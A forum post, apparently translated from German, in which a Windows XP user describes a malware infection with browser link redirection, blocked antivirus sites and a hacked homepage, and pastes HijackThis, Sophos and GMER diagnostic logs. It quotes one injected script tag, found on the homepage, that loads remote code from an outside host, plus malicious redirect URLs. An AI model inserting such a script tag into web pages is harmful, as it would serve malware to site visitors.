25.06.2010, 20:42 | #1
Links are redirected, AV websites and programs no longer work, homepage hacked

Hello,

After a problem with XP and the system repair, Avira's automatic update stopped working. After a scan with Avira I deleted a few files, which had no effect. I then installed NOD32, but the update doesn't work there either. A scan with the outdated signatures found nothing. Windows Update still seems to work. While doing that, though, I noticed that I can no longer open many antivirus websites, whether with Opera 9 or IE7. I get incomprehensible error messages:

Quote:
Windows-Dateischutz konnte eine Überprüfung der Systemdateien nicht initialisieren. Der spezifische Fehlercode ist 0x000006ba [Der RPC-Server ist nicht verfügbar.].

In addition, links in Opera are being altered, above all on Google and eBay. The targets are then advertising pages or sites like:

Code:
hxxp:// ///www.safe-monitoring.in/sx1/404.php
hxxp:// ///www.safe-monitoring-2.in/sx1/voli9x1.php?ID=20677&fb=....

HijackThis with the analysis on the website produced nothing conclusive, only 2 question marks. Malwarebytes starts but disappears after a few seconds; OTH didn't help. With Sophos Anti-Rootkit the GUI doesn't start, but I was able to run a scan from the console. GMER worked once, but sometimes the system got shut down. Currently GMER leads to a blue screen. WinSCP leads to full system load and then can't be terminated completely either (the process stays active). The following code was planted on my homepage:

Code:
<script src=hxxp:/ /multiplemarketing.info/images/gifimg.php ></script>

Here are a few more logs, though they are already a few days old:

HiJackThis:

Code:
Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 21:17:58, on 20.06.2010
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.21256)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Programme\Intel\Wireless\Bin\S24EvMon.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Programme\ESET\ESET NOD32 Antivirus\ekrn.exe
C:\Programme\Intel\Wireless\Bin\EvtEng.exe
C:\Programme\Nero\Nero 7\InCD\InCDsrv.exe
C:\Programme\Gemeinsame Dateien\LightScribe\LSSrvc.exe
C:\Programme\Intel\Wireless\Bin\RegSrvc.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\igfxtray.exe
C:\WINDOWS\system32\hkcmd.exe
C:\Programme\Synaptics\SynTP\SynTPEnh.exe
C:\Programme\Panasonic\Hotkey Appendix\HKEYAPP.EXE
C:\Programme\Panasonic\WSwitch\WSwitch.exe
C:\Programme\Nero\Nero 7\InCD\NBHGui.exe
C:\Programme\Nero\Nero 7\InCD\InCD.exe
C:\Programme\Elaborate Bytes\VirtualCloneDrive\VCDDaemon.exe
C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb04.exe
C:\Programme\ESET\ESET NOD32 Antivirus\egui.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Programme\Gemeinsame Dateien\LightScribe\LightScribeControlPanel.exe
C:\Programme\Sandboxie\SbieSvc.exe
C:\Programme\Sandboxie\SbieCtrl.exe
C:\Programme\Sandboxie\SandboxieRpcSs.exe
C:\WINDOWS\system32\wscntfy.exe
C:\WINDOWS\system32\taskmgr.exe
C:\Programme\Trend Micro\HiJackThis\HiJackThis.exe
C:\Programme\Opera\opera.exe
C:\WINDOWS\system32\NOTEPAD.EXE

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.de/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkId=69157
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Programme\Gemeinsame Dateien\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Programme\Java\jre1.6.0_06\bin\ssv.dll
O4 - HKLM\..\Run: [PCTVOICE] pctspk.exe
O4 - HKLM\..\Run: [IgfxTray] C:\WINDOWS\system32\igfxtray.exe
O4 - HKLM\..\Run: [HotKeysCmds] C:\WINDOWS\system32\hkcmd.exe
O4 - HKLM\..\Run: [SynTPLpr] C:\Programme\Synaptics\SynTP\SynTPLpr.exe
O4 - HKLM\..\Run: [SynTPEnh] C:\Programme\Synaptics\SynTP\SynTPEnh.exe
O4 - HKLM\..\Run: [IntelZeroConfig] "C:\Programme\Intel\Wireless\bin\ZCfgSvc.exe"
O4 - HKLM\..\Run: [IntelWireless] "C:\Programme\Intel\Wireless\Bin\ifrmewrk.exe" /tf Intel PROSet/Wireless
O4 - HKLM\..\Run: [Hotkey] C:\WINDOWS\system32\hkeyman.exe
O4 - HKLM\..\Run: [Panasonic Hotkey Manager] C:\Programme\Panasonic\Hotkey Appendix\HKEYAPP.EXE
O4 - HKLM\..\Run: [WSwitch] C:\Programme\Panasonic\WSwitch\WSwitch.exe
O4 - HKLM\..\Run: [PCinfo] C:\Programme\Panasonic\PCINFO\SetDiag.exe /FirstLogin
O4 - HKLM\..\Run: [NeroFilterCheck] C:\Programme\Gemeinsame Dateien\Ahead\Lib\NeroCheck.exe
O4 - HKLM\..\Run: [SecurDisc] C:\Programme\Nero\Nero 7\InCD\NBHGui.exe
O4 - HKLM\..\Run: [InCD] C:\Programme\Nero\Nero 7\InCD\InCD.exe
O4 - HKLM\..\Run: [VirtualCloneDrive] "C:\Programme\Elaborate Bytes\VirtualCloneDrive\VCDDaemon.exe" /s
O4 - HKLM\..\Run: [HPDJ Taskbar Utility] C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb04.exe
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Programme\Adobe\Reader 9.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [Adobe ARM] "C:\Programme\Gemeinsame Dateien\Adobe\ARM\1.0\AdobeARM.exe"
O4 - HKLM\..\Run: [egui] "C:\Programme\ESET\ESET NOD32 Antivirus\egui.exe" /hide /waitservice
O4 - HKLM\..\RunOnce: [Malwarebytes' Anti-Malware] C:\Programme\Malwarebytes' Anti-Malware\mbamgui.exe /install /silent
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [SandboxieControl] "C:\Programme\Sandboxie\SbieCtrl.exe"
O4 - HKCU\..\Run: [LightScribe Control Panel] C:\Programme\Gemeinsame Dateien\LightScribe\LightScribeControlPanel.exe -hidden
O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'NETZWERKDIENST')
O4 - HKUS\S-1-5-20\..\RunOnce: [nltide_3] rundll32 advpack.dll,LaunchINFSectionEx nLite.inf,C,,4,N (User 'NETZWERKDIENST')
O4 - HKUS\S-1-5-20\..\RunOnce: [ShowDeskFix] regsvr32 /s /n /i:u shell32 (User 'NETZWERKDIENST')
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\S-1-5-18\..\RunOnce: [nltide_3] rundll32 advpack.dll,LaunchINFSectionEx nLite.inf,C,,4,N (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
O4 - HKUS\.DEFAULT\..\RunOnce: [nltide_3] rundll32 advpack.dll,LaunchINFSectionEx nLite.inf,C,,4,N (User 'Default user')
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programme\Java\jre1.6.0_06\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Konsole - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programme\Java\jre1.6.0_06\bin\ssv.dll
O9 - Extra button: Run WinHTTrack - {36ECAF82-3300-8F84-092E-AFF36D6C7040} - C:\Programme\WinHTTrack\WinHTTrackIEBar.dll
O9 - Extra 'Tools' menuitem: Launch WinHTTrack - {36ECAF82-3300-8F84-092E-AFF36D6C7040} - C:\Programme\WinHTTrack\WinHTTrackIEBar.dll
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programme\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programme\Messenger\msmsgs.exe
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - hxxp://update.microsoft.com/microsoftupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1276015979588
O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} (MUWebControl Class) - hxxp://update.microsoft.com/microsoftupdate/v6/V5Controls/en/x86/client/muweb_site.cab?1276015904580
O17 - HKLM\System\CCS\Services\Tcpip\..\{D9AE09D2-9DAE-46C5-93FE-0DC1FCBB848E}: NameServer = 217.0.43.161 217.0.43.177
O22 - SharedTaskScheduler: Browseui preloader - {438755C2-A8BA-11D1-B96B-00A0C90312E1} - C:\WINDOWS\system32\browseui.dll
O22 - SharedTaskScheduler: Component Categories cache daemon - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\WINDOWS\system32\browseui.dll
O23 - Service: ESET HTTP Server (EhttpSrv) - ESET - C:\Programme\ESET\ESET NOD32 Antivirus\EHttpSrv.exe
O23 - Service: ESET Service (ekrn) - ESET - C:\Programme\ESET\ESET NOD32 Antivirus\ekrn.exe
O23 - Service: Intel(R) PROSet/Wireless Event Log (EvtEng) - Intel Corporation - C:\Programme\Intel\Wireless\Bin\EvtEng.exe
O23 - Service: InCD Helper (InCDsrv) - Nero AG - C:\Programme\Nero\Nero 7\InCD\InCDsrv.exe
O23 - Service: LightScribeService Direct Disc Labeling Service (LightScribeService) - Hewlett-Packard Company - C:\Programme\Gemeinsame Dateien\LightScribe\LSSrvc.exe
O23 - Service: NBService - Nero AG - C:\Programme\Nero\Nero 7\Nero BackItUp\NBService.exe
O23 - Service: NMIndexingService - Nero AG - C:\Programme\Gemeinsame Dateien\Ahead\Lib\NMIndexingService.exe
O23 - Service: Intel(R) PROSet/Wireless Registry Service (RegSrvc) - Intel Corporation - C:\Programme\Intel\Wireless\Bin\RegSrvc.exe
O23 - Service: Intel(R) PROSet/Wireless Service (S24EventMonitor) - Intel Corporation - C:\Programme\Intel\Wireless\Bin\S24EvMon.exe
O23 - Service: Sandboxie Service (SbieSvc) - tzuk - C:\Programme\Sandboxie\SbieSvc.exe

--
End of file - 8080 bytes

Sophos:

Code:
Sophos Anti-Rootkit Version 1.5.0 (c) 2009 Sophos Plc
Started logging on 19.06.2010 at 23:00:57
User "***" on computer "TOUGHBOOK"
Windows version 5.1 SP 3.0 Service Pack 3 build 2600 SM=0x100 PT=0x1 Win32
Info: Starting process scan.
Info: Starting registry scan.
Hidden: registry item \HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\midi9
Info: Starting disk scan of C: (NTFS).
Hidden: file C:\Dokumente und Einstellungen\***\Lokale Einstellungen\Anwendungsdaten\Opera\Opera\profile\images\http%3A%2F%2Fwww.pcgameshardware.de%2Faid,690398%2FVergleich-1980-zu-2009-Wie-schwer-und-teuer-ist-1-Petabyte-Datenspeicher%2FLaufwerk%2FNews%2Ffavicon.ico
Hidden: file C:\Dokumente und Einstellungen\***\Lokale Einstellungen\Anwendungsdaten\Opera\Opera\profile\images\http%3A%2F%2Fwww.pcgameshardware.de%2Faid,676309%2FUSB-30-Die-wichtigsten-Infos-zum-neuen-Technologie-Standard-Update%2FTechnologie%2FWissen%2Ffavicon.ico
Hidden: file C:\Dokumente und Einstellungen\***\Lokale Einstellungen\Anwendungsdaten\Opera\Opera\profile\images\http%3A%2F%2Fwww.pcgameshardware.de%2Faid,654197%2FDer-PCGH-Rivatuner-Guide-Teil-1-Einrichtung-und-Grundlagen%2FGrafikkarte%2FBildergalerie%2Ffavicon.ico
Hidden: file C:\Dokumente und Einstellungen\***\Lokale Einstellungen\Anwendungsdaten\Opera\Opera\profile\images\http%3A%2F%2Fwww.pcgameshardware.de%2Faid,678008%2FWestern-Digital-Caviar-Green-WD20EADS-2-Terabyte-Festplatte-im-Kurztest%2FLaufwerk%2FTest%2Ffavicon.ico
Info: Starting disk scan of D: (FAT).
Stopped logging on 19.06.2010 at 23:59:28

Gmer:

Code:
GMER 1.0.15.15281 - hxxp://www.gmer.net
Rootkit scan 2010-06-18 15:38:22
Windows 5.1.2600 Service Pack 3
Running: ins7dh0h.exe; Driver: C:\DOKUME~1\***\LOKALE~1\Temp\fwrdipod.sys

---- System - GMER 1.0.15 ----

SSDT \SystemRoot\system32\DRIVERS\ehdrv.sys (ESET Helper driver/ESET) ZwAssignProcessToJobObject [0xEE16F610]
SSDT \SystemRoot\system32\DRIVERS\ehdrv.sys (ESET Helper driver/ESET) ZwDebugActiveProcess [0xEE16FC10]
SSDT \SystemRoot\system32\DRIVERS\ehdrv.sys (ESET Helper driver/ESET) ZwDuplicateObject [0xEE16F730]
SSDT \SystemRoot\system32\DRIVERS\ehdrv.sys (ESET Helper driver/ESET) ZwOpenProcess [0xEE16F4B0]
SSDT \SystemRoot\system32\DRIVERS\ehdrv.sys (ESET Helper driver/ESET) ZwOpenThread [0xEE16F570]
SSDT \SystemRoot\system32\DRIVERS\ehdrv.sys (ESET Helper driver/ESET) ZwProtectVirtualMemory [0xEE16F6D0]
SSDT \SystemRoot\system32\DRIVERS\ehdrv.sys (ESET Helper driver/ESET) ZwSetContextThread [0xEE16F690]
SSDT \SystemRoot\system32\DRIVERS\ehdrv.sys (ESET Helper driver/ESET) ZwSetInformationThread [0xEE16F650]
SSDT \SystemRoot\system32\DRIVERS\ehdrv.sys (ESET Helper driver/ESET) ZwSetSecurityObject [0xEE16F7D0]
SSDT \SystemRoot\system32\DRIVERS\ehdrv.sys (ESET Helper driver/ESET) ZwSuspendProcess [0xEE16F510]
SSDT \SystemRoot\system32\DRIVERS\ehdrv.sys (ESET Helper driver/ESET) ZwSuspendThread [0xEE16F590]
SSDT \SystemRoot\system32\DRIVERS\ehdrv.sys (ESET Helper driver/ESET) ZwTerminateProcess [0xEE16F4D0]
SSDT \SystemRoot\system32\DRIVERS\ehdrv.sys (ESET Helper driver/ESET) ZwTerminateThread [0xEE16F5D0]
SSDT \SystemRoot\system32\DRIVERS\ehdrv.sys (ESET Helper driver/ESET) ZwWriteVirtualMemory [0xEE16F750]

---- Kernel code sections - GMER 1.0.15 ----

.text win32k.sys!EngAcquireSemaphore + 20E2 BF8082E8 5 Bytes JMP 852964D0
.text win32k.sys!EngFreeUserMem + 5BD2 BF80EE6F 5 Bytes JMP 85296430
.text win32k.sys!EngMulDiv + 8195 BF872D39 5 Bytes JMP 85296610
.text win32k.sys!XLATEOBJ_iXlate + 405D BF878F07 5 Bytes JMP 85296750
.text win32k.sys!EngCreatePalette + 1C0 BF87EA6A 5 Bytes JMP 85296570
.text win32k.sys!EngAlphaBlend + 2998 BF8C3163 5 Bytes JMP 852966B0
.text win32k.sys!PATHOBJ_bCloseFigure + 19F1 BF8F97FA 5 Bytes JMP 852967F0

---- User code sections - GMER 1.0.15 ----

.text C:\WINDOWS\system32\igfxtray.exe[264] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10023DF4
.text C:\WINDOWS\system32\igfxtray.exe[264] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10023C3C
.text C:\WINDOWS\system32\igfxtray.exe[264] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10023E78
.text C:\WINDOWS\system32\igfxtray.exe[264] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10023AF0
.text C:\WINDOWS\system32\igfxtray.exe[264] ws2_32.dll!send 71A14C27 5 Bytes JMP 10023264
.text C:\WINDOWS\system32\igfxtray.exe[264] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100227F8
.text C:\WINDOWS\system32\igfxtray.exe[264] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1002278C
.text C:\WINDOWS\system32\igfxtray.exe[264] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10023A9C
.text C:\WINDOWS\system32\hkcmd.exe[320] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10023DF4
.text C:\WINDOWS\system32\hkcmd.exe[320] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10023C3C
.text C:\WINDOWS\system32\hkcmd.exe[320] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10023E78
.text C:\WINDOWS\system32\hkcmd.exe[320] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10023AF0
.text C:\WINDOWS\system32\hkcmd.exe[320] ws2_32.dll!send 71A14C27 5 Bytes JMP 10023264
.text C:\WINDOWS\system32\hkcmd.exe[320] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100227F8
.text C:\WINDOWS\system32\hkcmd.exe[320] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1002278C
.text C:\WINDOWS\system32\hkcmd.exe[320] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10023A9C
.text C:\Programme\Intel\Wireless\Bin\RegSrvc.exe[344] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\Programme\Intel\Wireless\Bin\RegSrvc.exe[344] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\Programme\Intel\Wireless\Bin\RegSrvc.exe[344] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\Programme\Intel\Wireless\Bin\RegSrvc.exe[344] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\Programme\Intel\Wireless\Bin\RegSrvc.exe[344] ws2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\Programme\Intel\Wireless\Bin\RegSrvc.exe[344] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\Programme\Intel\Wireless\Bin\RegSrvc.exe[344] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\Programme\Intel\Wireless\Bin\RegSrvc.exe[344] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\Programme\Synaptics\SynTP\SynTPEnh.exe[364] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\Programme\Synaptics\SynTP\SynTPEnh.exe[364] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\Programme\Synaptics\SynTP\SynTPEnh.exe[364] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\Programme\Synaptics\SynTP\SynTPEnh.exe[364] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\Programme\Synaptics\SynTP\SynTPEnh.exe[364] ws2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\Programme\Synaptics\SynTP\SynTPEnh.exe[364] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\Programme\Synaptics\SynTP\SynTPEnh.exe[364] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\Programme\Synaptics\SynTP\SynTPEnh.exe[364] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\Programme\Nero\Nero 7\InCD\NBHGui.exe[440] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\Programme\Nero\Nero 7\InCD\NBHGui.exe[440] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\Programme\Nero\Nero 7\InCD\NBHGui.exe[440] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\Programme\Nero\Nero 7\InCD\NBHGui.exe[440] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\Programme\Nero\Nero 7\InCD\NBHGui.exe[440] ws2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\Programme\Nero\Nero 7\InCD\NBHGui.exe[440] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\Programme\Nero\Nero 7\InCD\NBHGui.exe[440] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\Programme\Nero\Nero 7\InCD\NBHGui.exe[440] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\Programme\Sandboxie\SbieSvc.exe[444] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\Programme\Sandboxie\SbieSvc.exe[444] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\Programme\Sandboxie\SbieSvc.exe[444] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\Programme\Sandboxie\SbieSvc.exe[444] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\Programme\Sandboxie\SbieSvc.exe[444] ws2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\Programme\Sandboxie\SbieSvc.exe[444] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\Programme\Sandboxie\SbieSvc.exe[444] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\Programme\Sandboxie\SbieSvc.exe[444] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\Programme\Panasonic\Hotkey Appendix\HKEYAPP.EXE[484] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\Programme\Panasonic\Hotkey Appendix\HKEYAPP.EXE[484] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\Programme\Panasonic\Hotkey Appendix\HKEYAPP.EXE[484] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\Programme\Panasonic\Hotkey Appendix\HKEYAPP.EXE[484] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\Programme\Panasonic\Hotkey Appendix\HKEYAPP.EXE[484] ws2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\Programme\Panasonic\Hotkey Appendix\HKEYAPP.EXE[484] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\Programme\Panasonic\Hotkey Appendix\HKEYAPP.EXE[484] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\Programme\Panasonic\Hotkey Appendix\HKEYAPP.EXE[484] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\Programme\Panasonic\WSwitch\WSwitch.exe[516] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\Programme\Panasonic\WSwitch\WSwitch.exe[516] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\Programme\Panasonic\WSwitch\WSwitch.exe[516] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\Programme\Panasonic\WSwitch\WSwitch.exe[516] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\Programme\Panasonic\WSwitch\WSwitch.exe[516] ws2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\Programme\Panasonic\WSwitch\WSwitch.exe[516] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\Programme\Panasonic\WSwitch\WSwitch.exe[516] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\Programme\Panasonic\WSwitch\WSwitch.exe[516] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\WINDOWS\Explorer.EXE[612] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\WINDOWS\Explorer.EXE[612] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\WINDOWS\Explorer.EXE[612] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\WINDOWS\Explorer.EXE[612] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\WINDOWS\Explorer.EXE[612] ws2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\WINDOWS\Explorer.EXE[612] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\WINDOWS\Explorer.EXE[612] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\WINDOWS\Explorer.EXE[612] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb04.exe[656] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb04.exe[656] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb04.exe[656] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb04.exe[656] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb04.exe[656] ws2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb04.exe[656] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb04.exe[656] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb04.exe[656] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\Programme\Elaborate Bytes\VirtualCloneDrive\VCDDaemon.exe[708] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10023DF4
.text C:\Programme\Elaborate Bytes\VirtualCloneDrive\VCDDaemon.exe[708] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10023C3C
.text C:\Programme\Elaborate Bytes\VirtualCloneDrive\VCDDaemon.exe[708] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10023E78
.text C:\Programme\Elaborate Bytes\VirtualCloneDrive\VCDDaemon.exe[708] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10023AF0
.text C:\Programme\Elaborate Bytes\VirtualCloneDrive\VCDDaemon.exe[708] ws2_32.dll!send 71A14C27 5 Bytes JMP 10023264
.text C:\Programme\Elaborate Bytes\VirtualCloneDrive\VCDDaemon.exe[708] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100227F8
.text C:\Programme\Elaborate Bytes\VirtualCloneDrive\VCDDaemon.exe[708] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1002278C
.text C:\Programme\Elaborate Bytes\VirtualCloneDrive\VCDDaemon.exe[708] ws2_32.dll!WSASend 71A168FA 5 Bytes JMP 10023A9C
.text C:\WINDOWS\system32\winlogon.exe[764] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\WINDOWS\system32\winlogon.exe[764] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\WINDOWS\system32\winlogon.exe[764] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\WINDOWS\system32\winlogon.exe[764] WS2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\WINDOWS\system32\winlogon.exe[764] WS2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\WINDOWS\system32\winlogon.exe[764] WS2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\WINDOWS\system32\winlogon.exe[764] WS2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
.text C:\WINDOWS\system32\winlogon.exe[764] WS2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C
.text C:\WINDOWS\system32\services.exe[820] ntdll.dll!NtOpenKey 7C91D5CE 5 Bytes JMP 10003DF4
.text C:\WINDOWS\system32\services.exe[820] kernel32.dll!CreateProcessW 7C802336 5 Bytes JMP 10003C3C
.text C:\WINDOWS\system32\services.exe[820] kernel32.dll!ExitProcess 7C81CB12 5 Bytes JMP 10003E78
.text C:\WINDOWS\system32\services.exe[820] ws2_32.dll!connect 71A14A07 5 Bytes JMP 10003AF0
.text C:\WINDOWS\system32\services.exe[820] ws2_32.dll!send 71A14C27 5 Bytes JMP 10003264
.text C:\WINDOWS\system32\services.exe[820] ws2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8
.text C:\WINDOWS\system32\services.exe[820] ws2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C
